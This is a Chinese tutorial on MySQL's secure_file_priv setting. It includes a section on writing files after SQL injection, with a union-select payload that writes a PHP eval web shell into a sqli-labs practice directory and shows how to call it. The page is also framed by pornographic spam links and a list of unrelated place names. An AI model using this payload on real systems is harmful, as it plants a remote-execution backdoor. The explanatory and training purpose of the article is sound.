最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

Mysql 中的secure_file_priv參數(shù)設置方法

 更新時間:2024年11月13日 14:23:56   作者:數(shù)字興  
MySQL的secure_file_priv變量用于限制文件的讀取和寫入,在后期漏洞注入中,可以使用INTO DUMPFILE和INTO OUTFILE將數(shù)據(jù)寫入文件,或者使用LOAD_FILE下載文件,本文介紹Mysql 中的secure_file_priv參數(shù)設置,感興趣的朋友一起看看吧

secure_file_priv是MySQL中的系統(tǒng)變量,用于限制文件的讀取和寫入。

該參數(shù)的設置可以通過my.ini(windows版本)/my.cnf(Linux版本)中設置。

修改完參數(shù)之后,必須重啟數(shù)據(jù)庫才能生效。

啟動MySQL,先查看secure_file_priv的值。

命令:show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的讀取和寫入。

2.secure_file_priv = 文件路徑 ,限制文件的讀取和寫入只能在設定的文件夾中。

3.secure_file_priv= "", 對文件和讀取和寫入沒有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路徑;

內(nèi)容在文件中是以一行的形式呈現(xiàn),多行數(shù)據(jù)會出現(xiàn)數(shù)據(jù)保存不全;

dumpfile只能寫一行,并且輸出中不存在任何格式。

2.select  *** into outfile  文件路徑;

內(nèi)容有特殊格式轉(zhuǎn)換,該換行換行,較比dumpfile更加好用;

outfile可以寫入多行數(shù)據(jù),并且字段和行終止符都可以作為格式輸出。

例如:?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

調(diào)用:url/test.php?123=phpinfo();

3.select  *** load_file (下載文件)

select  load_file(文件路徑);

到此這篇關(guān)于Mysql 中的secure_file_priv參數(shù)設置的文章就介紹到這了,更多相關(guān)mysql secure_file_priv參數(shù)設置內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Windows?Server?2019部署MySQL?8完整步驟教程

    Windows?Server?2019部署MySQL?8完整步驟教程

    MySQL在開發(fā)開源軟件時經(jīng)常被當作該軟件的數(shù)據(jù)管理系統(tǒng),所以我們在開發(fā)時將會經(jīng)常用到它,所以如何安裝MySQL就是一個問題了,這篇文章主要介紹了Windows Server 2019部署MySQL 8的相關(guān)資料,需要的朋友可以參考下
    2026-04-04
  • mysql查找配置文件位置的兩種方法

    mysql查找配置文件位置的兩種方法

    想去查看windows系統(tǒng)下,MySQL數(shù)據(jù)庫的配置文件,由于距離上一次查看時間太久,每次查看都要找很久在什么位置,所以本文給大家介紹了mysql查找配置文件位置的兩種方法,需要的朋友可以參考下
    2024-09-09
  • 關(guān)于MySQL的ORDER BY排序詳解

    關(guān)于MySQL的ORDER BY排序詳解

    這篇文章主要介紹了關(guān)于MySQL的ORDER BY排序詳解,如果沒有使用排序操作,默認情況下查詢返回的數(shù)據(jù)是按照添加數(shù)據(jù)的順序顯示的,需要的朋友可以參考下
    2023-05-05
  • MySQL 多列 IN 查詢之語法、性能與實戰(zhàn)技巧(最新整理)

    MySQL 多列 IN 查詢之語法、性能與實戰(zhàn)技巧(最新整理)

    本文詳解MySQL多列IN查詢,對比傳統(tǒng)OR寫法,強調(diào)其簡潔高效,適合批量匹配復合鍵,通過聯(lián)合索引、分批次優(yōu)化提升性能,兼容多種數(shù)據(jù)庫,提供動態(tài)生成和實戰(zhàn)技巧,助力復雜條件查詢優(yōu)化,感興趣的朋友一起看看吧
    2025-07-07
  • mysql日志文件在哪 如何修改MySQL日志文件位置

    mysql日志文件在哪 如何修改MySQL日志文件位置

    MySQL日志文件相信大家都有很多的了解,MySQL日志文件一般在:/var/log/mysqld.log,下面介紹如何修改MySQL日志文件位置,需要的朋友可以參考下
    2012-12-12
  • MySQL基礎學習之字符集的應用

    MySQL基礎學習之字符集的應用

    這篇文章主要為大家詳細介紹了MySQL中字符集的相關(guān)使用,例如字符集的查詢與修改和比較規(guī)則等,文中的示例代碼講解詳細,需要的可以參考一下
    2023-05-05
  • MySQL服務無法啟動且服務沒有報告任何錯誤的解決辦法

    MySQL服務無法啟動且服務沒有報告任何錯誤的解決辦法

    在啟動項目時,發(fā)現(xiàn)昨天能夠跑的項目今天跑不了了,一看原來是mysql數(shù)據(jù)庫出現(xiàn)了問題,下面這篇文章主要給大家介紹了關(guān)于MySQL服務無法啟動且服務沒有報告任何錯誤的解決辦法,需要的朋友可以參考下
    2023-05-05
  • 在VB.NET應用中使用MySQL的方法

    在VB.NET應用中使用MySQL的方法

    這篇文章主要介紹了在VB.NET應用中使用MySQL的方法,操作基于Visual Studio IDE進行,需要的朋友可以參考下
    2015-06-06
  • Linux遠程部署MySQL數(shù)據(jù)庫詳細步驟

    Linux遠程部署MySQL數(shù)據(jù)庫詳細步驟

    這篇文章主要介紹了Linux遠程部署MySQL數(shù)據(jù)庫的詳細步驟,文中步驟介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2019-11-11
  • mysql利用mysqlbinlog命令恢復誤刪除數(shù)據(jù)的實現(xiàn)

    mysql利用mysqlbinlog命令恢復誤刪除數(shù)據(jù)的實現(xiàn)

    這篇文章主要介紹了mysql利用mysqlbinlog命令恢復誤刪除數(shù)據(jù)的實現(xiàn),文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2021-03-03

最新評論

江达县| 新昌县| 中阳县| 杭锦后旗| 泸溪县| 新昌县| 镶黄旗| 基隆市| 湘乡市| 东阿县| 托克托县| 澄迈县| 凌源市| 三穗县| 聂拉木县| 晋中市| 读书| 长泰县| 绍兴市| 汾西县| 泸西县| 星子县| 闽清县| 个旧市| 中西区| 池州市| 息烽县| 奉新县| 措勤县| 山东省| 孝昌县| 万山特区| 长泰县| 修文县| 乐至县| 香港| 肥乡县| 承德县| 宝坻区| 巴彦县| 瑞安市|